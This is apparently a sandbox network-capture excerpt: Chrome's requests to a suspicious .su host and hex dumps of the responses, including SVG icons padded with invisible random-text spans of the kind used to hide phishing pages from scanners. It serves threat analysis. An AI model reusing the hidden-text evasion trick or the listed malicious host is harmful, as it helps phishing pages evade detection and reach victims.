                                                          2024-01-24 14:34:31 UTC1369INData Raw: ab 9f df 20 c5 c5 a5 7a 04 80 3b d8 1a 9f 25 0f 7c b0 43 47 00 00 00 00 00 00 00 00 00 00 00 c0 04 24 00 02 28 33 25 a5 a7 e4 e6 57 36 4b 42 ea 49 3d 02 c0 9d 4c fb e5 b0 cc 59 9a a8 23 00 00 00 00 00 00 00 00 00 00 00 e0 6a 24 00 02 28 33 93 66 ed 91 df b6 a4 ea 08 80 3b ba 73 ea 76 39 9c 92 a7 23 00 00 00 00 00 00 00 00 00 00 00 e0 4a 5e a7 1c f4 35 e0 d1 72 f2 8b 25 25 b3 40 b2 72 8b 24 2b af 44 0a 8b 4a 25 db 31 96 57 f0 c7 f5 3f 09 09 f2 15 3f 9f 0a 12 14 e0 2d 41 15 7d 24 c8 bf 82 84 87 f8 49 78 65 3f f1 75 8c 7b 8a f9 eb 93 e5 d2 67 d6 0b 9f 28 80 fb eb d3 2a 5c 7e 7f b1 9b 54 f0 f2 d2 23 00 00 00 00 00 00 00 00 00 e7 4e ed d5 aa 3d d9 a2 92 52 a9 e8 e7 2d 95 03 7d d8 87 00 00 e0 0c 91 00 08 8f a0 26 8c 87 92 f3 e4 40 52 be 1c 4c ce 75 5c e7 cb fe
                                                          Data Ascii: z;%|CG$(3%W6KBI=LY#j$(3f;sv9#J^5r%%@r$+DJ%1W??-A}$Ixe?u{g(*\~T#N=R-}&@RLu\
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 8e 9f b4 cb 07 00 00 00 00 00 ee ea a5 2f f7 c9 e3 9f c6 ea c8 b5 d4 5a ce fa 37 2e 38 af c2 28 00 00 d8 09 09 80 70 ba 55 3b 4f c8 8b 8e 09 e0 82 4d 29 c2 ab cf 75 d4 e9 97 ab bb 47 c9 2d 83 6a 4b bf 76 11 52 e1 34 3d 82 93 d2 4f ca a5 4f af 97 4d 71 99 7a 04 00 fe de af cf 75 95 01 ed 23 75 04 00 40 f9 50 49 7a 71 89 39 b2 37 31 57 e2 8f e6 4a 42 da 49 49 4c cb 97 c3 29 8e 47 ea 49 c9 f8 4b 42 9f 29 54 0b 9a a8 2a fe 52 af 6a 80 d4 8a a8 28 75 22 03 a5 41 8d 20 69 12 5d 49 9a 39 1e 91 a1 fe fa 37 01 00 00 00 00 00 ec 45 ed ff f6 1e bf 5a 4c 4a 3d 68 59 b7 b2 ac 7d a3 a7 04 f8 fd 71 90 13 00 00 77 46 02 20 9c 42 bd ca 7e db 94 22 2f 7e b5 4f 96 ef 38 a1 47 61 8a 3a 55 03 64 f4 85 75 e4 8a 1e 51 ff 75 12 a6 a8 b8 54 be 5a 7e 54 1e f8 70 a7 a4 66 15 ea 51
                                                          Data Ascii: /Z7.8(pU;OM)uG-jKvR4=OOMqzu#u@PIzq971WJBIIL)GIKB)T*Rj(u"A i]I97EZLJ=hY}qwF B~"/~O8Ga:UduQuTZ~TpfQ
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 71 a9 7e 06 76 54 a7 6a 80 55 15 70 cc 90 3a 12 1e 42 55 40 00 00 80 f2 44 02 20 4e 47 cd cd 7b 36 af 22 dd 1d 8f 0b 5a 56 91 66 75 2a 4b 05 4e d4 02 30 dc b5 cf 6f 94 79 ab 8e e9 c8 7c 33 1f 6a 27 37 f6 ab a5 23 00 00 dc 0b 09 80 38 63 ea 95 f2 de 8f 07 e4 fe 8f 76 b1 d1 07 00 38 63 1d 1a 86 c8 ba 37 7b 51 05 10 00 6c 2c 2b af 58 66 2d 3c 22 53 be 8b 97 f8 a4 3c 3d 0a 77 a1 aa 02 de dc a7 86 3c 74 75 43 ab 35 19 00 00 00 ca 1e 09 80 38 1b 41 01 3e d2 b3 59 98 f4 68 5e 45 ba b5 a8 22 5d 1d d7 01 7e b4 0e 06 60 96 ce f7 2c 97 4d 71 99 3a 32 df c4 1b 1a cb 84 9b 9a e8 08 00 00 f7 42 02 20 ce c8 91 e3 f9 72 cb ab 5b 64 e9 f6 34 3d 02 00 c0 99 9b ff 6c 17 19 dc b1 aa 8e 00 00 76 11 9f 94 2b 9f fc 72 58 de fe e9 90 64 e5 15 e9 51 b8 2b 95 ac 3f b8 5d a4 dc 75
                                                          Data Ascii: q~vTjUp:BU@D NG{6"ZVfu*KN0oy|3j'7#8cv8c7{Ql,+Xf-<"S<=w<tuC58A>Yh^E"]~`,Mq:2B r[d4=lv+rXdQ+?]u
                                                          2024-01-24 14:34:31 UTC1369INData Raw: bf 48 00 84 69 7c 7c 2a c8 8d bd 6b c8 7d c3 ea 4b eb 7a 21 7a 14 00 ce dc cc 85 47 64 e4 eb 5b 75 64 36 d5 16 fd c4 57 17 b2 e7 06 00 70 5b 24 00 7a b8 cc dc 22 19 f6 ec 06 59 ba 3d 4d 8f 00 70 26 75 c3 d1 be 7e 88 0c 6a 17 21 7d db 45 5a 95 fe 7c 7d 68 a3 76 26 f2 0a 4a 64 5d 6c ba 2c d9 72 5c 7e db 92 2a 1b f6 65 e8 67 60 3a d5 72 e4 c8 cc 01 12 12 e4 ab 47 00 00 e5 e9 60 72 9e dc f5 76 8c fc b2 d9 3e 2d 59 60 3f ea fb fd 95 91 cd 64 cc 45 75 c5 cb 4b 0f 02 00 00 e0 ff 23 01 10 26 eb d5 b2 8a 3c 7c 55 43 19 d2 a9 1a f3 79 00 67 2c ee 68 8e 34 19 b5 44 47 66 53 fb 6f cb 5e e9 a1 23 00 00 dc 0f 09 80 1e ec 68 5a be 5c f8 c4 3a d9 79 38 5b 8f 00 70 06 d5 2a ed f2 ae 51 32 b4 4b 35 e9 da 2c 4c 02 fc dc bb 9d af b3 1c 39 9e 2f bf 6c 48 91 ef 56 1f 93 85 31
                                                          Data Ascii: Hi||*k}Kz!zGd[ud6Wp[$z"Y=Mp&u~j!}EZ|}hv&Jd]l,r\~*eg`:rG`rv>-Y`?dEuK#&<|UCyg,h4DGfSo^#hZ\:y8[p*Q2K5,L9/lHV1
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 50 37 08 d7 f7 aa 2e f7 0f 6b 20 ed 1b 91 9c e4 89 8e a6 e5 cb 6b f3 f6 cb d4 9f 0f 49 71 71 a9 1e 45 59 bb ef b2 7a f2 da ed 2d 75 04 00 f8 37 aa a5 ca 3d 1f ec 14 6e e5 60 67 6a 5f f0 f1 ab 1b ca c4 11 4d d9 24 04 00 00 1e 81 04 40 b8 3b d5 16 f8 a3 fb db 48 ed aa 81 7a 04 80 27 52 fb 2a 17 3c b8 ca 65 9d e9 d4 12 c3 b4 7b da c8 c8 c1 b5 f5 08 00 00 9e 81 04 40 37 55 54 5c 2a c3 9e dd 20 f3 37 a6 e8 11 00 67 4a b5 2e b8 b9 4f 0d 79 e4 da 46 d2 a8 66 25 3d 0a 4f 76 3c a3 40 de fe 2e 5e 5e fd ee 00 15 01 cb 41 44 b0 9f 24 cc 1a 28 be 8e f7 1e 00 e0 9f 15 14 95 ca dd 53 63 e4 e3 df 8f e8 11 c0 fe ae ef 55 43 3e bc bf ad 04 fa 53 65 1b 00 00 b8 37 12 00 e1 09 54 b5 ef e7 6e 6e 22 f7 0d ab cf 41 1f c0 83 25 a5 9f 94 8b 26 ac 93 ad f1 59 7a c4 39 bc bd bd e4
                                                          Data Ascii: P7.k kIqqEYz-u7=n`gj_M$@;Hz'R*<e{@7UT\* 7gJ.OyFf%=Ov<@.^^AD$(ScUC>Se7Tnn"A%&Yz9
                                                          2024-01-24 14:34:31 UTC1369INData Raw: fe 4f 57 a4 4c c7 bc 39 fb 64 89 e4 3b e6 d3 19 39 9e 35 87 b6 8b db 87 d4 91 d7 6e 6f 21 01 8e 39 3f 00 28 25 8e cf f5 c4 d4 7c 39 91 5d e8 f8 ec 2e 91 53 8e ff 09 09 f4 91 c0 8a de 52 a7 5a 20 9f 17 00 00 9c 01 12 00 dd c0 6b f3 e2 64 fc f4 dd 3a 02 f0 57 2a a1 e8 f9 e1 4d e4 f6 8b eb 52 06 1c 4e a3 6e 56 df fc 36 5e 9e fc 6c 0f 6d 1b cf d2 af cf 75 95 01 ed 23 75 04 00 9e e7 2d c7 f7 c7 03 1f ed b4 0e f9 78 0a 1f 9f 0a 72 51 c7 48 b9 a6 57 4d b9 b8 4b 35 5b b7 f5 2d 2f 45 c5 a5 b2 2c 26 4d e6 ad 3c 2a 73 57 1e f3 98 8d 4c 95 04 f8 fb f3 5d a5 47 8b 2a 7a 04 00 00 c0 be 4c 4a 00 9c fb 78 47 19 76 41 75 1d b9 37 75 b0 a6 b0 b0 44 32 f2 8a ad 43 35 29 e9 85 92 9a 55 28 27 1c 8f 34 c7 23 35 bb 50 92 4e 14 48 52 46 81 1c 4c ce 93 c4 b4 02 ba 7b 38 41 e7 26
                                                          Data Ascii: OWL9d;95no!9?(%|9].SRZ kd:W*MRNnV6^lmu#u-xrQHWMK5[-/E,&M<*sWL]G*zLJxGvAu7uD2C5)U('4#5PNHRFL{8A&
                                                          2024-01-24 14:34:31 UTC986INData Raw: b7 f1 c7 72 65 d7 a1 1c d9 9b 90 23 b1 47 b2 65 7f 52 9e b5 30 94 78 a2 c0 96 95 83 22 82 fd ac 24 ce 86 d5 83 a4 41 f5 40 a9 67 fd 54 71 a0 c7 24 0c a8 85 be 3b df dc 26 b3 96 26 ea 11 fc 69 de 13 1d e5 8a 1e 2c 44 03 70 4f 87 53 f2 a4 eb fd 2b dd aa fd 93 6a d7 74 7d af 1a 32 e9 96 66 52 b7 1a ed 59 4d 53 50 54 2a ef fd 78 40 9e 9a bd d7 6d 92 4e 47 0e a8 25 d3 ee 6f 67 bd f6 00 00 00 ec 80 04 40 9c 8e 5a ef fd 66 c5 31 f9 6c 49 82 ec 4d cc d5 a3 9e 6b fc 55 0d 64 f2 ad cd 75 04 00 00 00 e0 df 90 00 68 23 6a a3 b0 e5 9d b4 fe 85 67 0b 0a f0 91 f7 ef 6a 25 37 f4 ab a5 47 dc 53 52 fa 49 59 b5 e3 84 6c dc 97 21 eb f7 64 c8 86 b8 4c 8f 7a ef 57 0f af 28 1d 1a 04 4b bb fa 21 d2 a6 81 7a 04 4b bd 6a 41 6e bb c1 fb d6 b7 f1 f2 c0 47 bb ce bb 22 a3 3b b9 73 68
                                                          Data Ascii: re#GeR0x"$A@gTq$;&&i,DpOS+jt}2fRYMSPT*x@mNG%og@Zf1lIMkUduh#jgj%7GSRIYl!dLzW(K!zKjAnG";sh


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.649762172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:31 UTC746OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zB HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:31 UTC722INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:31 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9nK8c%2Bfc2yS5z57EpZ8dKrzrpG0w0KSPQYhCoZ8LXOWi300wPZ3UVc7ofYDVFrFfMkOU3NnpJ3xtww2IIUV%2FZZ%2FfI6Lc2WeUrYmARf%2FmgNELdOXomULgUFd0ZySxrI%2BnVGl5WgUsPEhO664uwZmjrbBLp1X5"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6ada33b10b-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:31 UTC647INData Raw: 34 31 34 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 30 70 47 73 77 37 49 62 4a 61 4f 77 44 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                          Data Ascii: 414<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">0pGsw7IbJaOwD</span><span style="display: inli
                                                          2024-01-24 14:34:31 UTC404INData Raw: 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34
                                                          Data Ascii: 7,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#40404
                                                          2024-01-24 14:34:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.649763172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:31 UTC746OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3a HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:31 UTC722INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:31 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O88PoccPuqnMl3rolSofucTb60%2BlEpjBm4eSRNBWhMW76d4t7IFhl%2FWhyrH6a2RwWEL9x8QYgEs19OXczXoiIdcOtRYiTSoL6g%2F%2Bv%2BqH0ARzDgCpcpEfwzPWkHn87D5oEY3yU7XsMBbFFrvkc10UbJIgOEAo"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6b1eb544e1-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:31 UTC647INData Raw: 39 38 61 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 44 32 34 44 55 78 67 4d 7a 50 6a 34 61 71 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c
                                                          Data Ascii: 98a<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">D24DUxgMzPj4aq</text><span style="display: inl
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 51 76 44 42 31 41 6e 78 4d 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32 31 39 2d 31 2e 37
                                                          Data Ascii: 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">QvDB1AnxM</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.7
                                                          2024-01-24 14:34:31 UTC433INData Raw: 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74
                                                          Data Ascii: ,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font
                                                          2024-01-24 14:34:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.649764172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:31 UTC743OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6uvwhtyYID/2RkyVQrL8NsC HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:31 UTC695INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:31 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qXYkTfUzqSjLFy6Q3IHhaPxrxtP0Cj0NjSYcZImOvIDu51l9UfRC0SKdRhYYZCHedaUZqcjz9xD5OsK1Oiv%2BwScRP2kE%2FBVvyGSb%2FbHweFdX5RxA4djWRWBMnH6F7bwSADnKx%2F4akOf%2BtaKUMccyepOXdCxI"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6b4ef87bcc-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:31 UTC674INData Raw: 33 31 33 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b0 00 00 01 b0 08 06 00 00 00 90 22 89 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ec fd d9 8e 2c c9 96 a6 89 a9 bb 8d ee be 23 ce 98 79 b2 b2 aa 51 53 83 04 d8 20 c0 e7 2b b2 80 7a 02 f2 96 17 7c 91 be 23 01 82 bc e0 05 0b 44 37 49 90 a8 aa 24 b2 33 2b a7 73 22 62 6f 1f 6c 76 fe df 5a b2 54 c5 d4 d5 cc cd dd cd f7 10 b1 be bd d5 55 55 54 66 11 15 91 5f 45 54 ed e2 ff f4 7f fd bf 3d 36 df 08 e3 d1 a8 1c 7d 1d 5c 5e 3e 8d cf 6e b7 1d 34 7f 4f c6 a3 cb 66 b3 dd b5 fb 9a 43 d7 38 7f 33 17 3d 3f 1e 3b ff 23 2c 0b 27 ec 55 d7 07 c1 de 73 76 7a 44 da
                                                          Data Ascii: 313cPNGIHDR"gAMAasRGBpHYs(JIDATx^,#yQS +z|#D7I$3+s"bolvZTUUTf_ET=6}\^>n4OfC83=?;#,'UsvzD
                                                          2024-01-24 14:34:31 UTC1369INData Raw: fa b8 e3 14 be f6 34 be 65 ec 14 6e 6b f0 a7 9f e6 da de 21 f3 d7 12 63 30 c6 63 2f e1 ad f1 08 f7 e7 48 43 f2 f5 b0 dd ec d7 a3 d1 78 7f 8c 7f f1 3f fd cd df 5a 33 b7 53 95 bb 54 f5 63 1f 70 0e b5 d9 e7 60 d7 7b aa c5 00 bd 16 2d af e1 b2 3c 41 db ea df c5 b6 f3 eb 71 e4 69 ac cd 92 d7 f3 58 ea 4c cd 45 af fe 9c 62 27 18 b2 bb 59 af 9b 87 dd b8 9c fd b2 b9 ba dc 34 e3 c9 a4 9c 1d a7 ce e3 a1 7c 3d 06 6e 5f ea e6 39 86 fc 1c aa 2b 61 76 ce f0 4f 49 cf 7b 84 1b bc a7 df 6f a1 ce ff a1 b8 9d 92 6f a7 72 c8 af 3a 0e 7d ce 19 36 7c 89 fc 1f 4a 77 3f cd 71 fd a5 76 e1 4b a4 e9 a5 f4 d3 00 a7 c4 fb 14 77 43 76 82 d7 e6 0d 7e d6 6e fb 61 1c ba d6 37 7f 49 f8 c7 d2 01 e1 d7 90 bd 43 e1 1c 8b f7 10 a7 c6 a1 e6 98 9b 53 c3 ab d3 56 1f bf 85 7e d8 43 7e 0f d9 79 2d
                                                          Data Ascii: 4enk!c0c/HCx?Z3STcp`{-<AqiXLEb'Y4|=n_9+avOI{oor:}6|Jw?qvKwCv~na7ICSV~C~y-
